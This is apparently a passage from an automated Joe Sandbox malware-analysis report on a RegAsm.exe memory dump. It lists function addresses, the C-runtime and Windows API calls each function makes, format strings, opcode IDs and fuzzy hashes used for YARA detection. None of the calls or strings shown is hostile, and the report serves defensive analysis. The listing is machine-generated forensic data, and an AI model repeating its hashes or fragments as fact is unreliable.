                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcschr$memcpywcslen
                                                                • String ID: "
                                                                • API String ID: 1983396471-123907689
                                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _snwprintf.MSVCRT ref: 0040A398
                                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _snwprintfmemcpy
                                                                • String ID: %2.2X
                                                                • API String ID: 2789212964-323797159
                                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _snwprintf
                                                                • String ID: %%-%d.%ds
                                                                • API String ID: 3988819677-2008345750
                                                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 0040E770
                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: MessageSendmemset
                                                                • String ID: F^@
                                                                • API String ID: 568519121-3652327722
                                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: PlacementWindowmemset
                                                                • String ID: WinPos
                                                                • API String ID: 4036792311-2823255486
                                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                • memset.MSVCRT ref: 0042BAAE
                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$memset
                                                                • String ID:
                                                                • API String ID: 438689982-0
                                                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@$memset
                                                                • String ID:
                                                                • API String ID: 1860491036-0
                                                                • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                • free.MSVCRT ref: 0040A908
                                                                • free.MSVCRT ref: 0040A92B
                                                                • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free$memcpy$mallocwcslen
                                                                • String ID:
                                                                • API String ID: 726966127-0
                                                                • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                • free.MSVCRT ref: 0040B201
                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                • free.MSVCRT ref: 0040B224
                                                                • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free$memcpy$mallocwcslen
                                                                • String ID:
                                                                • API String ID: 726966127-0
                                                                • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                • free.MSVCRT ref: 0040B0FB
                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                • free.MSVCRT ref: 0040B12C
                                                                • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free$memcpy$mallocstrlen
                                                                • String ID:
                                                                • API String ID: 3669619086-0
                                                                • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                • malloc.MSVCRT ref: 00417407
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                • free.MSVCRT ref: 00417425
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                • String ID:
                                                                • API String ID: 2605342592-0
                                                                • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5